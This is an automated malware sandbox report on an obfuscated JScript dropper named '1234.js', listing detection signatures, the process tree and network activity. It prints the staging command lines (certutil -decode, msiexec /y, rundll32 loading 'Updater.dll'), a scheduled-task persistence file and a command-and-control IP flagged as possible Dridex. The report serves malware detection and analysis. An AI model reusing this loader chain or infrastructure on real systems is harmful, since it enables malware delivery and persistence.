Edit tour

Windows Analysis Report
1234.js

Overview

General Information

Sample name:	1234.js
Analysis ID:	1541406
MD5:	7dea02845300c31f60e21494c492c870
SHA1:	8ebbbeeb723eea278a343e95d1243577c445845b
SHA256:	9b38cc509b1a4a401275bcb5e896917c842431f9190c417147c35b20b99c4d85
Tags:	jsuser-pr0xylife
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

JScript performs obfuscated calls to suspicious functions

System process connects to network (likely due to code injection or exploit)

Found evasive API chain (may stop execution after checking mutex)

JavaScript source code contains functionality to generate code involving a shell, file or stream

Potential obfuscated javascript found

Sigma detected: WScript or CScript Dropper

Uses certutil -decode

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found dropped PE file which has not been started or loaded

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Msiexec Execute Arbitrary DLL

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

System is w10x64

wscript.exe (PID: 4320 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

certutil.exe (PID: 1196 cmdline: C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp MD5: F17616EC0522FC5633151F7CAA278CAA)

conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 2084 cmdline: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp MD5: E5DA170027542E25EDE42FC54C929077)

certutil.exe (PID: 6472 cmdline: C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp MD5: F17616EC0522FC5633151F7CAA278CAA)

conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 6788 cmdline: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp MD5: E5DA170027542E25EDE42FC54C929077)

rundll32.exe (PID: 5356 cmdline: C:\Windows\system32\rundll32.exe "C:\ProgramData\Tyrannosaurus Tech\Updater.dll",Start /u MD5: EF3179D498793BF4234F708D3BE28633)

cleanup

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js", ProcessId: 4320, ProcessName: wscript.exe

Sigma detected: Suspicious Msiexec Execute Arbitrary DLL

Source: Process started

Author: frack113: Data: Command: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp, CommandLine: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp, CommandLine|base64offset|contains: , Image: C:\Windows\System32\msiexec.exe, NewProcessName: C:\Windows\System32\msiexec.exe, OriginalFileName: C:\Windows\System32\msiexec.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp, ProcessId: 2084, ProcessName: msiexec.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js", ProcessId: 4320, ProcessName: wscript.exe

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T19:50:13.785415+0200	2028765	3	Unknown Traffic	192.168.2.4	50002	185.161.251.26	443	TCP
2024-10-24T19:50:14.836595+0200	2028765	3	Unknown Traffic	192.168.2.4	50003	185.161.251.26	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: unknown	HTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50003 version: TLS 1.2

Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A5113A0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,sprintf_s,FindFirstFileW,FindNextFileW,FindClose,

11_2_00007FFE1A5113A0

Software Vulnerabilities

JavaScript source code contains functionality to generate code involving a shell, file or stream

Source: 1234.js	Argument value : ['"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']	Go to definition
Source: 1234.js	Argument value : ['"1n 19(28,3y,3A){q o="";q i=0;28F(i<3A-28.28E().28D){o=o+3y;i++}o=o+28;3w(o)}1n 25(t){q 11,27;11=19(', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']	Go to definition
Source: 1234.js	Argument value : ['"1n 19(28,3y,3A){q o="";q i=0;28F(i<3A-28.28E().28D){o=o+3y;i++}o=o+28;3w(o)}1n 25(t){q 11,27;11=19(', '"function lPad(str,pad_char,pad_len){var o="";var i=0;while(i<pad_len-str.toString().length){o=o+pad']	Go to definition

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe

Network Connect: 185.161.251.26 443

Jump to behavior

Source: Joe Sandbox View

ASN Name: NTLGB NTLGB

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50002 -> 185.161.251.26:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:50003 -> 185.161.251.26:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown	TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown	TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown	TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown	TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown	TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown	TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown	TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown	TCP traffic detected without corresponding DNS query: 185.161.251.26
Source: unknown	TCP traffic detected without corresponding DNS query: 185.161.251.26

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A511C40 LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,SetLastError,HttpSendRequestW,GetLastError,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

11_2_00007FFE1A511C40

Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://185.161.251.26/
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://185.161.251.26/0
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://185.161.251.26/I
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEF18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://185.161.251.26/O&=
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://185.161.251.26/P
Source: rundll32.exe, 0000000B.00000002.2968427951.000002D3EEFD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://185.161.251.26/nfoEx2

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443

Source: unknown	HTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.26:443 -> 192.168.2.4:50003 version: TLS 1.2

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Tasks\Tyrannosaurus Tech.job

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A511C40	11_2_00007FFE1A511C40
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A5145E0	11_2_00007FFE1A5145E0
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A5168A0	11_2_00007FFE1A5168A0
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A512C40	11_2_00007FFE1A512C40
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A513F30	11_2_00007FFE1A513F30
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A51CD38	11_2_00007FFE1A51CD38
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A523508	11_2_00007FFE1A523508
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A51B310	11_2_00007FFE1A51B310
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A5218C0	11_2_00007FFE1A5218C0
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A51EFB0	11_2_00007FFE1A51EFB0
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A511990	11_2_00007FFE1A511990
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A515160	11_2_00007FFE1A515160
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A518F68	11_2_00007FFE1A518F68
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A513170	11_2_00007FFE1A513170
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A522578	11_2_00007FFE1A522578
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A522D5C	11_2_00007FFE1A522D5C
Source: C:\Windows\System32\rundll32.exe	Code function: 11_2_00007FFE1A5221C8	11_2_00007FFE1A5221C8

Source: 1234.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal76.evad.winJS@8/4@0/1

Source: C:\Windows\System32\rundll32.exe

Code function: 11_2_00007FFE1A517740 CoInitializeEx,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,SysAllocString,SysAllocString,SysFreeString,SysFreeString,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,

11_2_00007FFE1A517740

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\461592c6-32a2-4a5a-9542-783ba1348002
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\5bba9e40-0e32-4b7f-b39a-667bbc0c2293

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\rad603BF.tmp

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Tyrannosaurus Tech\Updater.dll",Start /u

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1234.js"
Source: unknown	Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Source: C:\Windows\System32\certutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp
Source: unknown	Process created: C:\Windows\System32\certutil.exe C:\Windows\system32\certutil.EXE -decode rad603BF.tmp rad00257.tmp
Source: C:\Windows\System32\certutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad00257.tmp
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\ProgramData\Tyrannosaurus Tech\Updater.dll",Start /u

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

